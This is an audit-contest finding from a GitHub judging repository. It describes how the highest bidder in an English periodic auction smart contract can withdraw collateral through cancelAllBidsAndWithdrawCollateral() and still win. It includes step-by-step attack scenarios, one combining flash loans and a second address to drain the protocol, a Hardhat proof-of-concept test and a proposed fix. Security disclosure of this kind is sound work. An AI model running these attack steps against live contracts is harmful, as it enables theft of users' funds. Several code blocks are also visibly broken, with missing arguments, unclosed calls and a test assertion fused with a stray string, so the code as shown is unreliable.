sherlock-audit / 2024-02-radicalxchange-judging

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ljj - [H-01] Highest bidder can cancel their bid and withdraw their collateral. #82

Closed sherlock-admin3 closed 8 months ago

sherlock-admin3 commented 8 months ago



[H-01] Highest bidder can cancel their bid and withdraw their collateral.


The highest bidder is normally forbidden from canceling their bid. However, due to a vulnerability, they can cancel and withdraw their bid while still remaining the highest bidder and winning the auction. This allows an attacker to win an auction by only paying the fee amount and then withdrawing their collateral amount. This vulnerability also leads to an incorrect collateral calculation within the protocol, which will drain the protocol's funds.

Vulnerability Detail

The highest bidder is prevented from calling the cancelBid() function, which would call the _cancelBid() function and revert with the following check at :

            bidder != l.highestBids[tokenId][round].bidder,
            'EnglishPeriodicAuction: Cannot cancel bid if highest bidder'

However, this same check is not implemented in _cancelAllBids(). This means the highest bidder is able to call cancelAllBidsAndWithdrawCollateral() to cancel their bid, withdraw their collateral, and still be the highest bidder.

Attack scenario will go as follows:

  1.  The attacker calls placeBid() on an auction with a very high amount of ether to ensure they are the highest bidder. Flashloans can be used to increase the impact of this attack.
  2. The attacker calls cancelAllBidsAndWithdrawCollateral() to get their collateral back but remain the highest bidder. 3. The attacker calls closeAuction() and becomes the owner of the Steward License token.

A more dangerous attack scenario exists as well:

  1. The attacker is the current steward of the Steward License token.

  2. The attacker uses flashloans with another address (let's call it address2) they own to place a very high bid on the auction using the placeBid() function.

  3. The attacker calls cancelAllBidsAndWithdrawCollateral() on address2 to ensure they withdraw their collateral minus the fee amount and remain the highest bidder.

  4. The attacker calls closeAuction(), and address2 becomes the new Steward License token owner.

  5. The closeAuction() function adds the bid amount to the attacker's (old steward's) collateral with the following line at :

 } else if (
            l.highestBids[tokenId][currentAuctionRound].bidder != oldBidder
        ) {
            // Transfer bid to previous bidder's collateral
            l.availableCollateral[oldBidder] += l.highestBids[tokenId][currentAuctionRound].bidAmount;

6) The attacker calls withdrawCollateral() to withdraw the high amount of collateral they now own, completely draining the protocol of its funds.


Add the following test in EnglishPeriodicAuction.ts :

describe('cancelBid', function () {
    it.only('will not revert if highest bidder cancels and withdraws', async function () {
      // Auction start: Now - 200
      // Auction end: Now + 100
      const instance = await getInstance({
        auctionLengthSeconds: 300,
        initialPeriodStartTime: (await time.latest()) - 200,
        licensePeriod: 1000,
      const licenseMock = await ethers.getContractAt(

      const bidAmount = ethers.utils.parseEther('1.1');
      const feeAmount = await instance.calculateFeeFromBid(bidAmount);
      const collateralAmount = feeAmount.add(bidAmount);

      const bidAmount2 = ethers.utils.parseEther('1.2');
      const feeAmount2 = await instance.calculateFeeFromBid(bidAmount2);
      const collateralAmount2 = feeAmount2.add(bidAmount2);

      //bid with both accounts.
      await instance.connect(bidder1).placeBid(0, bidAmount, { value: collateralAmount }); 
      await instance.connect(bidder2).placeBid(0, bidAmount2, { value: collateralAmount2 });
      //bidder2 balance after placing bid.
      const oldBidderBalance = await ethers.provider.getBalance(bidder2.address,);
      //bidder2 cancels bid and withdraws while highest bidder.
      await expect(instance.connect(bidder2).cancelAllBidsAndWithdrawCollateral(0),)'EnglishPeriodicAuction: Cannot cancel bid if highest bidder',);

      const highestBid = await instance['highestBid(uint256)'](0);
      //will not revert if bidder2 is the highest bidder.
      //close auction
      await time.increase(300);
      await instance.connect(bidder2).closeAuction(0);
      //check owner of tokenId = 0 after auction is closed.
      const ownerOfToken = await licenseMock.ownerOf(0);
      //will not revert if bidder2 is the owner of tokenId = 0.
      expect(await ownerOfToken);
      //print balances of bidder2 after placing a bid and after cancelling their bid and withdrawing.
      const newBidderBalance = await ethers.provider.getBalance(bidder2.address,);
      console.log(`Old bidder2 balance: ${ethers.utils.formatEther(oldBidderBalance)} - New bidder2 balance ${ethers.utils.formatEther(newBidderBalance)}`)

Running the test will show that the attacker withdraws their token and gets their balances back. They will still be the highest bidder and become the owner of the Steward License token.


The attacker will be the highest bidder and therefore become the owner of the token while only having paid a fee amount. The old steward's l.availableCollateral will be increased by the amount of collateral that was already withdrawn from the system by the attacker. This means that when the old steward calls withdrawCollateral(), they will be draining the protocol of its funds. This vulnerability will leave the protocol in a bankrupt state and will not allow any more users to withdraw their collateral.

Code Snippet

    function _cancelAllBids(uint256 tokenId, address bidder) internal {
            storage l = EnglishPeriodicAuctionStorage.layout();

        uint256 currentAuctionRound = l.currentAuctionRound[tokenId];

        for (uint256 i = 0; i <= currentAuctionRound; i++) {
            Bid storage bid = l.bids[tokenId][i][bidder];

            if (bid.collateralAmount > 0) {
                // Make collateral available to withdraw
                l.availableCollateral[bidder] += bid.collateralAmount;

                // Reset collateral and bid
                bid.collateralAmount = 0;
                bid.bidAmount = 0;

Tool used

Manual Review, Hardhat


Change _cancelAllBids function as follows:

    function _cancelAllBids(uint256 tokenId, address bidder) internal {
            storage l = EnglishPeriodicAuctionStorage.layout();

        uint256 currentAuctionRound = l.currentAuctionRound[tokenId];

        for (uint256 i = 0; i <= currentAuctionRound; i++) {
            Bid storage bid = l.bids[tokenId][i][bidder];

            if (bid.collateralAmount > 0) {
                //call _cancelBid
        _cancelBid(tokenId, i, bidder);

Duplicate of #14